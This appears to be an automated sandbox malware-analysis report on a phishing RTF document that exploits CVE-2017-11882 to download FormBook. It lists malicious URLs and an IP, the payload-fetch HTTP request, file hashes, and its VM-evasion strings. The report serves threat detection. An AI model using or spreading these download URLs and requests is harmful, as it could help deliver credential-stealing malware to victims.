          Source: princedan859323.exe | Binary or memory string: 3V97MjDwzNY10/CE3FdlPTc3QDRJmTHAfugGZ6zy6kRSVp+JZqpfk8Ffo9rd0+zrd2KPwKN3IwbD9bQLswwzDhyn4PdAUcVsBK5n\77208IwpEVv/3DMWkIIYr+GO0CgNtkcu/AzuJ1M8gweiCBUod5UYqcxkP0QAKl0hwizDJ5b4pZws5eikxSjRN4UuQgGFVmciINBjSJ\7NLLQdzKojxbpxogKKZWM8B1Zm8STIrPk9ANQxogWqeZZSr2a6ZmW+yC
          Source: princedan859323.exe, 00000004.00000002.2177753348.0000000002291000.00000004.00000001.sdmp | Binary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
          Source: princedan859323.exe, 00000004.00000002.2177753348.0000000002291000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: princedan859323.exe | Binary or memory string: drNC7TIZTDW2xdJg6023IiTjmTuQlBYEtkPt+T/Us4SLdWi2qlCcddJ8V\7R0tAT+wpPaK51PoqE0nSbQ8X0gIV1QeMUdu7fBCInEO6ADyk+Y6Pj50bA89PiZBRwnUO9K3Ns0/btgvn5n7ypGhhTP0mZCoNxZCnK\7nl3WEoY5NqGqiGi1R8cYbO9DuvgNpNPQlR0tOwm091GcDraPdworFfl+/7zsOq5SWDlDvKmIEUiEy8m9CKUXDLxi9/PJynX1DX
          Source: princedan859323.exe, 00000004.00000002.2177753348.0000000002291000.00000004.00000001.sdmp | Binary or memory string: model0Microsoft|VMWare|Virtual
          Source: princedan859323.exe | Binary or memory string: w9pCcvmCiBslevp3ENTZ7Gyl/KlvjcVV5O5tkWLNvHWw9ziuxOZ14kJmcS95b5CG53h40gwz2mI1prpmN63K34RqlKTfBw\782M5soaHLKwjrxjbF44wWMH/mXEYo9EtG3RCo8RZu8v2iOPMGsDtVxMtQ/RInns4u4kM+YSRbJmUomHt2yet9GjBmvzKjwGocN5e2\7S6Ai96HFLuDqu3p28Ouz3oupVo6bq9Tq4z84+QXrbm011Rn3/M4xD+nOhVufu
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Memory allocated: page read and write | page guard
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\princedan859323.exe C:\Users\user\AppData\Roaming\princedan859323.exe
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Process created: C:\Users\user\AppData\Local\Temp\princedan859323.exe C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Queries volume information: C:\Users\user\AppData\Roaming\princedan859323.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\princedan859323.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.princedan859323.exe.340af10.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.princedan859323.exe.33994f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Exploitation for Client Execution13 | Path Interception | Process Injection11 | Masquerading1 | OS Credential Dumping | Security Software Discovery21 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion21 | Security Account Manager | Virtualization/Sandbox Evasion21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection11 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol122 | SIM Card Swap | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing1 | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery13 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact

          Behavior Graph


          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label | Link
          PO4018308875.doc | 41% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882

          Dropped Files

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe | 24% | ReversingLabs | ByteCode-MSIL.Coinminer.BitCoinMiner
          C:\Users\user\AppData\Local\Temp\princedan859323.exe | 24% | ReversingLabs | ByteCode-MSIL.Coinminer.BitCoinMiner
          C:\Users\user\AppData\Roaming\princedan859323.exe | 24% | ReversingLabs | ByteCode-MSIL.Coinminer.BitCoinMiner

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label | Link
          http://topv.xyz/princedanx.exe | 100% | Avira URL Cloud | malware
          www.containerflippers.com/np0c/ | 0% | Avira URL Cloud | safe
          http://go.microso | 0% | Avira URL Cloud | safe
          http://www.opera.com0 | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          topv.xyz | 185.239.243.112 | true | true | | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://topv.xyz/princedanx.exe | true | Avira URL Cloud: malware | unknown
            www.containerflippers.com/np0c/ | true | Avira URL Cloud: safe | low

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://go.microso | princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.opera.com0 | princedan859323.exe, 00000004.00000002.2177159184.000000000055D000.00000004.00000020.sdmp, princedan859323.exe.2.dr | false | Avira URL Cloud: safe | unknown

            Contacted IPs


            Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.239.243.112 | topv.xyz | Moldova Republic of | 55933 | CLOUDIE-AS-AP Cloudie Limited HK | true

            General Information

            Joe Sandbox Version:33.0.0 White Diamond
            Analysis ID:452509
            Start date:22.07.2021
            Start time:14:13:52
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 27s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:PO4018308875.doc
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:15
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.expl.evad.winDOC@24/10@2/1
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 89%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .doc
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            • Exclude process from analysis (whitelisted): dllhost.exe
            • TCP Packets have been reduced to 100
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtEnumerateValueKey calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/452509/sample/PO4018308875.doc

            Simulations

            Behavior and APIs

Time | Type | Description
14:14:35 | API Interceptor | 39x Sleep call for process: EQNEDT32.EXE modified
14:14:37 | API Interceptor | 284x Sleep call for process: princedan859323.exe modified

            Joe Sandbox View / Context

            IPs

Match: 185.239.243.112
Associated Sample Name / URL | Detection | Context
ORDER . 4500028602 .doc | malicious | sabaint.me/polanco/peso.exe
Document02.doc | malicious | ebie.xyz/whesilox.exe
product list.doc | malicious | ebie.xyz/arinzex.exe
Doc56576847896543987652134.doc | malicious | ebie.xyz/catx.exe
KOC_RFQ.doc | malicious | ebie.xyz/mazx.exe
RFQ.doc | malicious | ebie.xyz/mazx.exe
RFQ NO. 352008.doc | malicious | ebie.xyz/quotation.exe
Reques for quotation 775887886966.doc | malicious | ebie.xyz/ugopoundx.exe
6AOqEvqF3M.exe | malicious | sabaint.me/inc/4f4d258ff734e9.php
ORDER_683703789238738.xlsx | malicious | sabaint.me/inc/4f4d258ff734e9.php
product list.doc | malicious | ebie.xyz/arinzex.exe
KV18RE001-A5193.doc | malicious | ebie.xyz/whesilox.exe
REQUIREMENT-DWG-454888_2021.doc | malicious | ebie.xyz/whesilox.exe
purchase order.doc | malicious | ebie.xyz/mazx.exe
product list.doc | malicious | ebie.xyz/arinzex.exe
M9M9ZylTGS.exe | malicious | sabaint.me/inc/4f4d258ff734e9.php
FLK0057021_1062.doc | malicious | ebie.xyz/whesilox.exe
DOC.1000000567.267805032019.doc__.rtf | malicious | ebie.xyz/catx.exe
13076885-RFQ.doc | malicious | lontorz.xyz/bigheadx.exe
soa.xlsx | malicious | lontorz.xyz/wealthx.exe

            Domains

            No context

            ASN

Match: CLOUDIE-AS-AP Cloudie Limited HK
Associated Sample Name / URL | Detection | Context
ORDER . 4500028602 .doc | malicious | 185.239.243.112
Document02.doc | malicious | 185.239.243.112
product list.doc | malicious | 185.239.243.112
jEbpttXKCa | malicious | 45.114.9.184
Doc56576847896543987652134.doc | malicious | 185.239.243.112
KOC_RFQ.doc | malicious | 185.239.243.112
RFQ.doc | malicious | 185.239.243.112
RFQ NO. 352008.doc | malicious | 185.239.243.112
Reques for quotation 775887886966.doc | malicious | 185.239.243.112
6AOqEvqF3M.exe | malicious | 185.239.243.112
ORDER_683703789238738.xlsx | malicious | 185.239.243.112
product list.doc | malicious | 185.239.243.112
KV18RE001-A5193.doc | malicious | 185.239.243.112
REQUIREMENT-DWG-454888_2021.doc | malicious | 185.239.243.112
purchase order.doc | malicious | 185.239.243.112
product list.doc | malicious | 185.239.243.112
M9M9ZylTGS.exe | malicious | 185.239.243.112
FLK0057021_1062.doc | malicious | 185.239.243.112
DOC.1000000567.267805032019.doc__.rtf | malicious | 185.239.243.112
recovered_bin2 | malicious | 103.215.93.26

            JA3 Fingerprints

            No context

            Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\princedan859323.exe | 9thuIDnsFV.exe | malicious
C:\Users\user\AppData\Roaming\princedan859323.exe | 9thuIDnsFV.exe | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe | 9thuIDnsFV.exe | malicious

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:downloaded
                  Size (bytes):648912
                  Entropy (8bit):6.555584592279825
                  Encrypted:false
                  SSDEEP:12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
                  MD5:0E715DB2198FF670F4BF0E88E0E9B547
                  SHA1:2DE5030A9261655E5879E4FABA7B5E79D1DD483E
                  SHA-256:4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
                  SHA-512:8FB7EA121D51C489BAC9D8D6B35E94FC8BC5E5E218DA53AD952326F6C558FA7484E54842B2C6ABBA36C5EC5BB0E6EB51FDAB46B3F98DAEE3569EF8C6EC400BCD
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 24%
                  Joe Sandbox View:
• Filename: 9thuIDnsFV.exe, Detection: malicious
                  IE Cache URL:http://topv.xyz/princedanx.exe
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B09F78D-537D-406E-B057-1B1541B1D39D}.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):1024
                  Entropy (8bit):0.05390218305374581
                  Encrypted:false
                  SSDEEP:3:ol3lYdn:4Wn
                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                  Malicious:false
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C67C7B4A-7023-4170-93C2-146687425423}.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):13060
                  Entropy (8bit):3.6035304738533385
                  Encrypted:false
                  SSDEEP:384:Cl+vMM/BDBMlLLlJYALFfVaiYeZSFOgRd877HAIVAInZ:CAUM/VBMBL/TZIRm771HZ
                  MD5:2DB4DE4C5E457296FF44D1728A100C76
                  SHA1:2AB1FB75384D496227A18FC5F53F2AAC1DE4851E
                  SHA-256:E9B6823D049FAA04166EE7C5333D356B417E1C4F8BCCF2C416ACB954F3896B85
                  SHA-512:858EA2D72F6C9BBF797E45BA08B4A7BF7A36973402496255C62C6369BAE4698384CF18A0E669471C237931D94BBB31755891D20ED01BDF9BADB3D57683198541
                  Malicious:false
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F7C72BCE-A594-453E-9048-97C10E531855}.tmp
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):1536
                  Entropy (8bit):1.3550337874831702
                  Encrypted:false
                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb4:IiiiiiiiiifdLloZQc8++lsJe1MzD
                  MD5:9BDF023D1B68473A259350323CCCE99B
                  SHA1:B56CDFA0AFE1A41A14D0338577B154664D30A1C8
                  SHA-256:1E0CB911731852A3D7848B5059595B5598052192AC76D95212FB3661B337C043
                  SHA-512:894B4E706923F6F6BB297882884C49A2F1C1FA04F8807F554EA8B71AA1269F38E1EDD3D776601D72BAB90C1FF1F91866184F91B44E47FB254D57453811C182BC
                  Malicious:false
                  C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Process:C:\Users\user\AppData\Roaming\princedan859323.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):648912
                  Entropy (8bit):6.555584592279825
                  Encrypted:false
                  SSDEEP:12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
                  MD5:0E715DB2198FF670F4BF0E88E0E9B547
                  SHA1:2DE5030A9261655E5879E4FABA7B5E79D1DD483E
                  SHA-256:4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
                  SHA-512:8FB7EA121D51C489BAC9D8D6B35E94FC8BC5E5E218DA53AD952326F6C558FA7484E54842B2C6ABBA36C5EC5BB0E6EB51FDAB46B3F98DAEE3569EF8C6EC400BCD
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 24%
                  Joe Sandbox View:
• Filename: 9thuIDnsFV.exe, Detection: malicious
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO4018308875.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Jul 22 20:14:33 2021, length=50939, window=hide
                  Category:dropped
                  Size (bytes):2048
                  Entropy (8bit):4.516075145711735
                  Encrypted:false
                  SSDEEP:24:8FT/XTd6jFyBNRJegER8Dv3qgdM7dD2FT/XTd6jFyBNRJegER8Dv3qgdM7dV:81/XT0jFGNUgQh21/XT0jFGNUgQ/
                  MD5:229CF85BF54BC33AB9218FEB0D78C9D2
                  SHA1:B360F768D9A7289E543DBC46A3BBA17AA14C3201
                  SHA-256:25DCC5819EEFE9F405B0C6797B09E7E614C6CC3A058CACC465652FBA2A50B5FF
                  SHA-512:10F4461E8441D7628CC8E0C2296D7E81631643A715B8689D840D0EF49809378D4C8894FDE69783C578A5EB8871C0F3E720DE4F7CEE14FD6B1D1E1F51AFC7E4E1
                  Malicious:false
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):74
                  Entropy (8bit):4.218418487239803
                  Encrypted:false
                  SSDEEP:3:M1gzUcQeUltbcQeUlmX1gzUcQeUlv:MizYeSfeszYe2
                  MD5:839E988B45AF03E03223EAFB330777D7
                  SHA1:0125F60C82CE60C0A57E62FB19BB9EC4EB122ADE
                  SHA-256:65A555177CBA318C35718AC9B0938024CC9B315DDC93B0FEC888A1E1ACCFB555
                  SHA-512:2994B9CC0865A8454CC81DE3F0B359AEC48F0597FD58661A5299C00E16CF46A3370A721D24A449C934F83DE85700911471ADA751CDCE2B02FBE6B1B36C8A8836
                  Malicious:false
                  Preview: [doc]..PO4018308875.LNK=0..PO4018308875.LNK=0..[doc]..PO4018308875.LNK=0..
                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.4311600611816426
                  Encrypted:false
                  SSDEEP:3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
                  MD5:390880DCFAA790037FA37F50A7080387
                  SHA1:760940B899B1DC961633242DB5FF170A0522B0A5
                  SHA-256:BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
                  SHA-512:47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
                  Malicious:false
                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                  C:\Users\user\AppData\Roaming\princedan859323.exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):648912
                  Entropy (8bit):6.555584592279825
                  Encrypted:false
                  SSDEEP:12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
                  MD5:0E715DB2198FF670F4BF0E88E0E9B547
                  SHA1:2DE5030A9261655E5879E4FABA7B5E79D1DD483E
                  SHA-256:4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
                  SHA-512:8FB7EA121D51C489BAC9D8D6B35E94FC8BC5E5E218DA53AD952326F6C558FA7484E54842B2C6ABBA36C5EC5BB0E6EB51FDAB46B3F98DAEE3569EF8C6EC400BCD
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 24%
                  Joe Sandbox View:
• Filename: 9thuIDnsFV.exe, Detection: malicious
                  C:\Users\user\Desktop\~$4018308875.doc
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.4311600611816426
                  Encrypted:false
                  SSDEEP:3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
                  MD5:390880DCFAA790037FA37F50A7080387
                  SHA1:760940B899B1DC961633242DB5FF170A0522B0A5
                  SHA-256:BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
                  SHA-512:47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
                  Malicious:false
                  Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                  Static File Info

                  General

                  File type:Rich Text Format data, unknown version
                  Entropy (8bit):2.507525665153884
                  TrID:
                  • Rich Text Format (5005/1) 55.56%
                  • Rich Text Format (4004/1) 44.44%
                  File name:PO4018308875.doc
                  File size:50939
                  MD5:1e7bc879d7960afaa08148c635ae534f
                  SHA1:e1a0db056bdc1cba07ef43c27a80e5bfd79b4eac
                  SHA256:8c4b07ce49252a4ed12ad611a9f8fde65a63fc12368c6726776e86e140d3872e
                  SHA512:87305e45665309e3e6de38aae33a61481445257cbef1f4ce268db0223481bb6b0acaed8d81aafee00a43d53b0278fd27a2fcd34ef51b670ca86c34108ea49366
                  SSDEEP:384:4X84SHQPomX+n++jLu9qk2kw03n6bL+p5DhnxKxGS:4aR++jLu9Mkw07p5D9xKxGS
                  File Content Preview:{\rtf340281;|2.?.2.&`.|>%-</38>!90%]?6-9>.4)76?;&_._.?*?*<@)67'.@&&?4$,%1./+9%?.&|6[:?|:[?&?(%:-+*>9'??:].1--83_'7*''.=40]#%60908,;_4?9$?8>(3.+74?+([?8.':8`??%??<.8..^32?*8;%%(|3;6;?2<)78=:77^0&.30[@)^8>/!@[?67^(]5$2~:-02>;=>_<4--[4&'4?*92.%:%#0.>6.7.0:%(

                  File Icon

                  Icon Hash:e4eea2aaa4b4b4a4

                  Static RTF Info

                  Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 0000177Ch | | | | | | | | no
1 | 00001739h | 2 | embedded | EQuaTION.3 | 1415 | | | | no

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  Jul 22, 2021 14:14:41.550184965 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550203085 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550235987 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550275087 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550322056 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550344944 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550362110 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550369024 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550379038 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550403118 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550415993 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550436974 CEST8049165185.239.243.112192.168.2.22
                  Jul 22, 2021 14:14:41.550448895 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550474882 CEST4916580192.168.2.22185.239.243.112
                  Jul 22, 2021 14:14:41.550494909 CEST8049165185.239.243.112192.168.2.22

                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jul 22, 2021 14:14:41.152980089 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                  Jul 22, 2021 14:14:41.210225105 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                  Jul 22, 2021 14:14:41.210582018 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                  Jul 22, 2021 14:14:41.267796040 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Jul 22, 2021 14:14:41.152980089 CEST | 192.168.2.22 | 8.8.8.8 | 0x62a5 | Standard query (0) | topv.xyz | A (IP address) | IN (0x0001)
                  Jul 22, 2021 14:14:41.210582018 CEST | 192.168.2.22 | 8.8.8.8 | 0x62a5 | Standard query (0) | topv.xyz | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Jul 22, 2021 14:14:41.210225105 CEST | 8.8.8.8 | 192.168.2.22 | 0x62a5 | No error (0) | topv.xyz | | 185.239.243.112 | A (IP address) | IN (0x0001)
                  Jul 22, 2021 14:14:41.267796040 CEST | 8.8.8.8 | 192.168.2.22 | 0x62a5 | No error (0) | topv.xyz | | 185.239.243.112 | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • topv.xyz

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.22 | 49165 | 185.239.243.112 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Timestamp | kBytes transferred | Direction | Data
                  Jul 22, 2021 14:14:41.335500002 CEST | 0 | OUT | GET /princedanx.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: topv.xyz
                  Connection: Keep-Alive
                  Jul 22, 2021 14:14:41.441436052 CEST | 2 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Thu, 22 Jul 2021 12:14:41 GMT
                  Content-Type: application/x-msdownload
                  Content-Length: 648912
                  Last-Modified: Wed, 21 Jul 2021 23:31:35 GMT
                  Connection: keep-alive
                  ETag: "60f8ae57-9e6d0"
                  Accept-Ranges: bytes
